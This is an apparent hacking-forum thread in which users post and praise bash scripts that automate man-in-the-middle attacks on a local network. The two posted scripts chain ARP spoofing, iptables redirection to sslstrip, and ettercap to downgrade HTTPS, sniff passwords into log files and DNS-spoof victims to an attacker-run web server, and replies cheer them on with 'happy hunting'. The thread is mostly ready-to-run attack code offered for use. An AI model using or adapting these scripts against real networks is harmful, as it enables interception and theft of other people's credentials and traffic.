Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spoof.

[cqghost]

I modified a script that i found, hopefully made it a little more user friendly. I hope that it will be a benefit to the community.
This script used ARP Spoof, SSL Strip, and ETTERCAP to sniff passwords and logs the findings to a user-specified folder. When you exit ETTERCAP properly, you will see the results from the log file using etterlog. Again, hopefully this will benefit the community.

And also as a reminder, I don't take full credit for this script. I used the good ideas from other scripts and made this one. Also, this probably isn't perfect, so feel free to adjust it to your liking.

Code:

#!/bin/bash
echo -e "Please ensure \E[32m\033[1m'echo 1 > /proc/sys/net/ipv4/ip_forward'\E[37m\033[0m has been performed as root"
echo -e "If you plan to spoof change your IP in \E[32m\033[1m'/usr/share/ettercap/etter.dns'\E[37m\033[0m"
echo -n "Please enter the name of the folder that will be created with all the log files:    "
read -e folder
echo -n "please enter the name of the log file:    "
read -e file
echo -n "Please enter the router IP:    "
read routerip
echo -n "Please enter interface name (eg: wlan0):    "
read iface
echo -n "Would you like to dns spoof at this time? [y/n]"
read spoof
sudo mkdir /root/$folder
sudo xterm -geometry 75x15+1+300 -T "ARP Spoof" -e arpspoof -i $iface $routerip &
sleep 2
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "Routed IP Tables"
sudo xterm -geometry 75x15+500+300 -T "SSL Strip" -e sslstrip -a -k -f &
echo "SSL Strip Launched successfully"
sleep 2
if [ "$spoof" = "n" ]; then
sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -l /root/$folder/$file -P autoadd
else
sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -P dns_spoof
fi
killall sslstrip
killall arpspoof
sudo etterlog -p -i /root/$folder/$file.eci
exit

[me.haez]

i like it thx

[Middle]

I made a similar script, tried to make it in as few as lines as possible so user interface isn't great, you just enter Sniff or Spoof. However you need to have configured apache2 prior to using the script for spoofing to work, other wise you will just be redirecting traffic to: 'It works!'

Code:

#!/bin/bash
#Middle /03/01/10

gateway=$(route -n | grep -v Gateway | head -n 5 | tail -n -1  | awk  -F " " '{print $2}' )
interface=$(route | grep -v Gateway | head -n 5 | tail -n -1  | awk  -F " " '{print $8}' )
ip=$(ifconfig | grep Bc | awk -F " " '{print$2}' | tail -n 1 | cut -c 6-20)

#Sniff
function sniff {
xterm -hold -e/ "echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f -k -w cap 2>/dev/null" &
xterm -hold -e arpspoof -i $interface $gateway &
}

#Spoof
function spoof {
sudo /etc/init.d/apache2 start  
echo "* A $ip" >> /usr/share/ettercap/etter.dns 
ettercap -T -q -i $interface -M arp:remote /$gateway/ // -P dns_spoof
}

clear
echo -n 'Sniff or Spoof?: '
read x
if [ $x == 'Sniff' ]; then
$"sniff"
fi
if [ $x == 'Spoof' ]; then
$"spoof"
fi

[comaX]

I don't know why this is in the expert forum but... never mind. I also made a script, for the exact same purpose, that I think is more complete than yours (yet, doesn't mean better...). I made a thread a few days ago in the beginner forum : http://www.backtrack-linux.org/forum...utomation.html . You might also want to check http://comax.pagesperso-orange.fr/info/mitm/ for download, source, and demonstration video.

I hope this will help !

[longjidin]

nice bro....!! its doesnt matter just do and keep the good work. ...happy hunting!

[sostentado]

tnx mate!!!!!!!!!! )